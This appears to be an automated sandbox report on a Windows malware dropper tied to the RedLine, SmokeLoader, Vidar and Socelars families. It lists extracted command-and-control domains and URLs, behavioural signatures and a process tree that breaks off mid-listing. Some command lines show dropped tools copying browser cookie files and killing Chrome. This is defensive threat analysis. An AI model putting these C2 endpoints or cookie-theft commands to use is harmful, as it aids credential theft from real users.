redline | 64ac76b13292907c1f38ed314a15f7129e09b0acac831d62451a4feb0ae2a54c

Analysis

max time kernel
10s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
03-08-2021 11:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a311311c248170e59b39810a31a0cd1e.exe
Size

3.3MB
MD5

a311311c248170e59b39810a31a0cd1e
SHA1

2f135d322b06f124e49c951e26a2cbec9b70d771
SHA256

64ac76b13292907c1f38ed314a15f7129e09b0acac831d62451a4feb0ae2a54c
SHA512

887cdcfddb99b18f8ea6b93fd8e4f5eed5475fd09714ef741b3e70f755a780b961b299bbfd6f7a44921aaab5cfbd844ca9a712cd86f1b2aa153f239cf7ffdb9b

Score

10^/10

redline smokeloader socelars vidar 706 aniold aspackv2 backdoor evasion infostealer persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Family

vidar

Version

39.8

Botnet

706

https://xeronxikxxx.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

AniOLD

liezaphare.xyz:80

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerUNdlL32.eXerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5852	5700	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6376	5700	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6736	5700	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8900	5700	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7436	5700	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4640-264-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/5012-302-0x0000000002E20000-0x0000000002E5A000-memory.dmp	family_redline
behavioral2/memory/5112-304-0x00000000047E0000-0x0000000004813000-memory.dmp	family_redline
behavioral2/memory/4640-268-0x0000000000418836-mapping.dmp	family_redline
behavioral2/memory/2760-344-0x0000000000418832-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\askinstall54.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\askinstall54.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2664-232-0x00000000031A0000-0x000000000323D000-memory.dmp	family_vidar
behavioral2/memory/2664-233-0x0000000000400000-0x000000000146C000-memory.dmp	family_vidar

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libcurlpp.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\libcurlpp.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 32 IoCs

Processes:

setup_install.exesahiba_1.exesahiba_3.exesahiba_6.exesahiba_7.exesahiba_9.exesahiba_2.exesahiba_5.exesahiba_4.exesahiba_8.exesahiba_10.exesahiba_5.tmpsahiba_8.tmpsahiba_1.exesetup.exe11111.exeLzmwAqmV.exe2660024.exe1962382.exeaskinstall54.exechome2.exe7231721.exe1211909.exeGLKbrow.exejames2.exejfiag3g_gg.exejhuuee.exejfiag3g_gg.exeWinHoster.exesahiba_4.exesetup11.exe

pid	process
2028	setup_install.exe
2160	sahiba_1.exe
2664	sahiba_3.exe
2248	sahiba_6.exe
3396	sahiba_7.exe
2136	sahiba_9.exe
1056	sahiba_2.exe
4128	sahiba_5.exe
4160	sahiba_4.exe
4248	sahiba_8.exe
4304	sahiba_10.exe
4316	sahiba_5.tmp
4408	sahiba_8.tmp
4520	sahiba_1.exe
4676	setup.exe
4712	11111.exe
4768	LzmwAqmV.exe
4824	2660024.exe
4860	1962382.exe
4940	askinstall54.exe
5024	chome2.exe
5012	7231721.exe
5112	1211909.exe
4068	GLKbrow.exe
4280	james2.exe
1968	jfiag3g_gg.exe
4512	jhuuee.exe
2096	jfiag3g_gg.exe
4228	WinHoster.exe
4640	sahiba_4.exe
4676	setup.exe
5020	setup11.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

sahiba_7.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation sahiba_7.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	sahiba_7.exe

Loads dropped DLL 8 IoCs

Processes:

setup_install.exesahiba_5.tmpsahiba_8.tmp

pid	process
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
2028	setup_install.exe
4316	sahiba_5.tmp
4408	sahiba_8.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

1962382.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1962382.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 ipinfo.io
14 ip-api.com
168 ipinfo.io
174 ipinfo.io
230 ip-api.com
10 ipinfo.io
Suspicious use of SetThreadContext 1 IoCs

Processes:

sahiba_4.exe

description pid process target process

PID 4160 set thread context of 4640 4160 sahiba_4.exe sahiba_4.exe

flow	ioc
11	ipinfo.io
14	ip-api.com
168	ipinfo.io
174	ipinfo.io
230	ip-api.com
10	ipinfo.io

description	pid	process	target process
PID 4160 set thread context of 4640	4160	sahiba_4.exe	sahiba_4.exe

autoit_exe 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\james2.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\james2.exe	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4552	6012	WerFault.exe	AcQIoZNXcL_3bqQF9vrMocv6.exe
5668	5976	WerFault.exe	psY_syms0SW2xRgig7h0r44a.exe
5624	6012	WerFault.exe	AcQIoZNXcL_3bqQF9vrMocv6.exe
3388	5976	WerFault.exe	psY_syms0SW2xRgig7h0r44a.exe
5324	6012	WerFault.exe	AcQIoZNXcL_3bqQF9vrMocv6.exe
5992	6012	WerFault.exe	AcQIoZNXcL_3bqQF9vrMocv6.exe
6104	6012	WerFault.exe	AcQIoZNXcL_3bqQF9vrMocv6.exe
960	5976	WerFault.exe	psY_syms0SW2xRgig7h0r44a.exe
6260	5976	WerFault.exe	psY_syms0SW2xRgig7h0r44a.exe
6600	5976	WerFault.exe	psY_syms0SW2xRgig7h0r44a.exe
9612	6324	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

sahiba_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5852 schtasks.exe
8788 schtasks.exe
1900 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

8940 timeout.exe
6356 timeout.exe
5144 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

7100 ipconfig.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

8448 taskkill.exe
4028 taskkill.exe
6784 taskkill.exe
3680 taskkill.exe
7604 taskkill.exe
8400 taskkill.exe
9956 taskkill.exe

pid	process
5852	schtasks.exe
8788	schtasks.exe
1900	schtasks.exe

pid	process
8940	timeout.exe
6356	timeout.exe
5144	timeout.exe

pid	process
7100	ipconfig.exe

pid	process
8448	taskkill.exe
4028	taskkill.exe
6784	taskkill.exe
3680	taskkill.exe
7604	taskkill.exe
8400	taskkill.exe
9956	taskkill.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	171	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

sahiba_7.exesahiba_2.exe

pid	process
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
3396	sahiba_7.exe
1056	sahiba_2.exe
1056	sahiba_2.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

sahiba_10.exesahiba_6.exeaskinstall54.exe2660024.exe

description	pid	process
Token: SeDebugPrivilege	4304	sahiba_10.exe
Token: SeDebugPrivilege	2248	sahiba_6.exe
Token: SeCreateTokenPrivilege	4940	askinstall54.exe
Token: SeAssignPrimaryTokenPrivilege	4940	askinstall54.exe
Token: SeLockMemoryPrivilege	4940	askinstall54.exe
Token: SeIncreaseQuotaPrivilege	4940	askinstall54.exe
Token: SeMachineAccountPrivilege	4940	askinstall54.exe
Token: SeTcbPrivilege	4940	askinstall54.exe
Token: SeSecurityPrivilege	4940	askinstall54.exe
Token: SeTakeOwnershipPrivilege	4940	askinstall54.exe
Token: SeLoadDriverPrivilege	4940	askinstall54.exe
Token: SeSystemProfilePrivilege	4940	askinstall54.exe
Token: SeSystemtimePrivilege	4940	askinstall54.exe
Token: SeProfSingleProcessPrivilege	4940	askinstall54.exe
Token: SeIncBasePriorityPrivilege	4940	askinstall54.exe
Token: SeCreatePagefilePrivilege	4940	askinstall54.exe
Token: SeCreatePermanentPrivilege	4940	askinstall54.exe
Token: SeBackupPrivilege	4940	askinstall54.exe
Token: SeRestorePrivilege	4940	askinstall54.exe
Token: SeShutdownPrivilege	4940	askinstall54.exe
Token: SeDebugPrivilege	4940	askinstall54.exe
Token: SeAuditPrivilege	4940	askinstall54.exe
Token: SeSystemEnvironmentPrivilege	4940	askinstall54.exe
Token: SeChangeNotifyPrivilege	4940	askinstall54.exe
Token: SeRemoteShutdownPrivilege	4940	askinstall54.exe
Token: SeUndockPrivilege	4940	askinstall54.exe
Token: SeSyncAgentPrivilege	4940	askinstall54.exe
Token: SeEnableDelegationPrivilege	4940	askinstall54.exe
Token: SeManageVolumePrivilege	4940	askinstall54.exe
Token: SeImpersonatePrivilege	4940	askinstall54.exe
Token: SeCreateGlobalPrivilege	4940	askinstall54.exe
Token: 31	4940	askinstall54.exe
Token: 32	4940	askinstall54.exe
Token: 33	4940	askinstall54.exe
Token: 34	4940	askinstall54.exe
Token: 35	4940	askinstall54.exe
Token: SeDebugPrivilege	4824	2660024.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

james2.exe

pid process

4280 james2.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

james2.exe

pid process

4280 james2.exe

pid	process
4280	james2.exe

pid	process
4280	james2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a311311c248170e59b39810a31a0cd1e.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesahiba_5.exe

description	pid	process	target process
PID 4004 wrote to memory of 2028	4004	a311311c248170e59b39810a31a0cd1e.exe	setup_install.exe
PID 4004 wrote to memory of 2028	4004	a311311c248170e59b39810a31a0cd1e.exe	setup_install.exe
PID 4004 wrote to memory of 2028	4004	a311311c248170e59b39810a31a0cd1e.exe	setup_install.exe
PID 2028 wrote to memory of 756	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 756	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 756	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 2760	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 2760	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 2760	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3220	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3220	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3220	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 2384	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 2384	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 2384	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1328	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1328	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1328	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1772	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1772	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1772	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3924	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3924	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3924	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1864	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1864	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1864	2028	setup_install.exe	cmd.exe
PID 756 wrote to memory of 2160	756	cmd.exe	sahiba_1.exe
PID 756 wrote to memory of 2160	756	cmd.exe	sahiba_1.exe
PID 756 wrote to memory of 2160	756	cmd.exe	sahiba_1.exe
PID 1772 wrote to memory of 2248	1772	cmd.exe	sahiba_6.exe
PID 1772 wrote to memory of 2248	1772	cmd.exe	sahiba_6.exe
PID 3220 wrote to memory of 2664	3220	cmd.exe	sahiba_3.exe
PID 3220 wrote to memory of 2664	3220	cmd.exe	sahiba_3.exe
PID 3220 wrote to memory of 2664	3220	cmd.exe	sahiba_3.exe
PID 2028 wrote to memory of 3680	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3680	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 3680	2028	setup_install.exe	cmd.exe
PID 3924 wrote to memory of 3396	3924	cmd.exe	sahiba_7.exe
PID 3924 wrote to memory of 3396	3924	cmd.exe	sahiba_7.exe
PID 3924 wrote to memory of 3396	3924	cmd.exe	sahiba_7.exe
PID 2028 wrote to memory of 1824	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1824	2028	setup_install.exe	cmd.exe
PID 2028 wrote to memory of 1824	2028	setup_install.exe	cmd.exe
PID 3680 wrote to memory of 2136	3680	cmd.exe	sahiba_9.exe
PID 3680 wrote to memory of 2136	3680	cmd.exe	sahiba_9.exe
PID 3680 wrote to memory of 2136	3680	cmd.exe	sahiba_9.exe
PID 2760 wrote to memory of 1056	2760	cmd.exe	sahiba_2.exe
PID 2760 wrote to memory of 1056	2760	cmd.exe	sahiba_2.exe
PID 2760 wrote to memory of 1056	2760	cmd.exe	sahiba_2.exe
PID 1328 wrote to memory of 4128	1328	cmd.exe	sahiba_5.exe
PID 1328 wrote to memory of 4128	1328	cmd.exe	sahiba_5.exe
PID 1328 wrote to memory of 4128	1328	cmd.exe	sahiba_5.exe
PID 2384 wrote to memory of 4160	2384	cmd.exe	sahiba_4.exe
PID 2384 wrote to memory of 4160	2384	cmd.exe	sahiba_4.exe
PID 2384 wrote to memory of 4160	2384	cmd.exe	sahiba_4.exe
PID 1864 wrote to memory of 4248	1864	cmd.exe	sahiba_8.exe
PID 1864 wrote to memory of 4248	1864	cmd.exe	sahiba_8.exe
PID 1864 wrote to memory of 4248	1864	cmd.exe	sahiba_8.exe
PID 1824 wrote to memory of 4304	1824	cmd.exe	sahiba_10.exe
PID 1824 wrote to memory of 4304	1824	cmd.exe	sahiba_10.exe
PID 4128 wrote to memory of 4316	4128	sahiba_5.exe	sahiba_5.tmp
PID 4128 wrote to memory of 4316	4128	sahiba_5.exe	sahiba_5.tmp
PID 4128 wrote to memory of 4316	4128	sahiba_5.exe	sahiba_5.tmp

C:\Users\Admin\AppData\Local\Temp\a311311c248170e59b39810a31a0cd1e.exe
"C:\Users\Admin\AppData\Local\Temp\a311311c248170e59b39810a31a0cd1e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4004

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:756

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_1.exe
sahiba_1.exe
4⤵
- Executes dropped EXE
PID:2160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3220

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_3.exe
sahiba_3.exe
4⤵
- Executes dropped EXE
PID:2664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2760

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_2.exe
sahiba_2.exe
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2384

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_4.exe
sahiba_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4160

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_4.exe
5⤵
- Executes dropped EXE
PID:4640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1328

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_5.exe
sahiba_5.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4128

C:\Users\Admin\AppData\Local\Temp\is-756DV.tmp\sahiba_5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-756DV.tmp\sahiba_5.tmp" /SL5="$5005A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_5.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4316

C:\Users\Admin\AppData\Local\Temp\is-Q6H30.tmp\dshsq__________((.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q6H30.tmp\dshsq__________((.exe" /S /UID=sysmo8
6⤵
PID:4136

C:\Program Files\Uninstall Information\OGPZZHAKOM\SystemMonitor.exe
"C:\Program Files\Uninstall Information\OGPZZHAKOM\SystemMonitor.exe" /VERYSILENT
7⤵
PID:6040

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 644
8⤵
PID:5780

C:\Users\Admin\AppData\Local\Temp\0e-c16ff-000-55889-542b89973abc2\Qepaegybaewo.exe
"C:\Users\Admin\AppData\Local\Temp\0e-c16ff-000-55889-542b89973abc2\Qepaegybaewo.exe"
7⤵
PID:6696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4ljgv4s.wp4\GcleanerEU.exe /eufive & exit
8⤵
PID:7880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qhbipmhv.con\installer.exe /qn CAMPAIGN="654" & exit
8⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\qhbipmhv.con\installer.exe
C:\Users\Admin\AppData\Local\Temp\qhbipmhv.con\installer.exe /qn CAMPAIGN="654"
9⤵
PID:7776

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qhbipmhv.con\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qhbipmhv.con\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1627731151 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
10⤵
PID:9996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yfiara3u.yej\ebook.exe & exit
8⤵
PID:7432

C:\Users\Admin\AppData\Local\Temp\yfiara3u.yej\ebook.exe
C:\Users\Admin\AppData\Local\Temp\yfiara3u.yej\ebook.exe
9⤵
PID:7896

C:\Users\Admin\AppData\Local\Temp\is-NB51U.tmp\ebook.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NB51U.tmp\ebook.tmp" /SL5="$60362,28982256,486912,C:\Users\Admin\AppData\Local\Temp\yfiara3u.yej\ebook.exe"
10⤵
PID:3536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e4cphhcm.pfs\md6_6ydj.exe & exit
8⤵
PID:7224

C:\Users\Admin\AppData\Local\Temp\e4cphhcm.pfs\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\e4cphhcm.pfs\md6_6ydj.exe
9⤵
PID:8432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ti0rfmb.k0q\ufgaa.exe & exit
8⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\1ti0rfmb.k0q\ufgaa.exe
C:\Users\Admin\AppData\Local\Temp\1ti0rfmb.k0q\ufgaa.exe
9⤵
PID:8424

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:10020

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:10124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0lj2jhof.tid\anyname.exe & exit
8⤵
PID:8888

C:\Users\Admin\AppData\Local\Temp\0lj2jhof.tid\anyname.exe
C:\Users\Admin\AppData\Local\Temp\0lj2jhof.tid\anyname.exe
9⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\0lj2jhof.tid\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\0lj2jhof.tid\anyname.exe" -a
10⤵
PID:8956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vswsr2ow.3cs\askinstall52.exe & exit
8⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\vswsr2ow.3cs\askinstall52.exe
C:\Users\Admin\AppData\Local\Temp\vswsr2ow.3cs\askinstall52.exe
9⤵
PID:6276

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
10⤵
PID:9400

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
11⤵
- Kills process with taskkill
PID:9956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ocbwxzri.guo\5674d7511aa1fce0a68969dc57375b63.exe & exit
8⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\ocbwxzri.guo\5674d7511aa1fce0a68969dc57375b63.exe
C:\Users\Admin\AppData\Local\Temp\ocbwxzri.guo\5674d7511aa1fce0a68969dc57375b63.exe
9⤵
PID:8768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j3et2xmu.o3q\GcleanerWW.exe /mixone & exit
8⤵
PID:7180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3a2l23xx.t2r\toolspab1.exe & exit
8⤵
PID:7020

C:\Users\Admin\AppData\Local\Temp\3a2l23xx.t2r\toolspab1.exe
